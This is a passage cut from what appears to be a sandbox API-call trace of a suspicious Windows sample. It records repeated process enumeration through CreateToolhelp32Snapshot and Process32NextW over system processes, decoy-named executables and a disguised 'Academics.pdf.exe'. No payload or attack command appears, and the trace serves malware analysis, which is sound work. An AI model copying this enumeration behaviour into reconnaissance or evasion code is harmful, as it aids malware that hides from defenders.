szExeFile="svchost.exe")) returned 1 [0303.070] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.071] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.072] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.073] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.074] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0303.074] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.075] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.076] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0303.077] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0303.078] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0303.079] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0303.079] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.080] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0303.081] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0303.082] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0303.083] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0303.084] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0303.085] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0303.085] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0303.086] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0303.087] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0303.088] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0303.089] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0303.090] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0303.090] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0303.091] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0303.092] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0303.093] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0303.094] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0303.094] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0303.095] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0303.096] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0303.097] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.098] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0303.099] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.099] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0303.100] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0303.101] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0303.102] CloseHandle (hObject=0x294) returned 1 [0303.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0303.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0303.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0303.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0303.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0303.102] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0303.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0303.102] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0303.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0303.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0303.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0303.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0303.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0303.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0303.103] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0303.105] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0303.106] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0303.106] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0303.107] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0303.108] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0303.109] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0303.110] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0303.111] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0303.112] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0303.112] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0303.113] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.114] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.115] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.116] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.117] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.117] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0303.118] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.119] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.120] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0303.121] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0303.121] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0303.122] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0303.123] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.124] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0303.125] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0303.125] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0303.126] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0303.127] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0303.128] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0303.129] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0303.129] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0303.130] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0303.131] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0303.132] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0303.133] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0303.133] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0303.134] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0303.135] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0303.136] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0303.137] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0303.137] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: 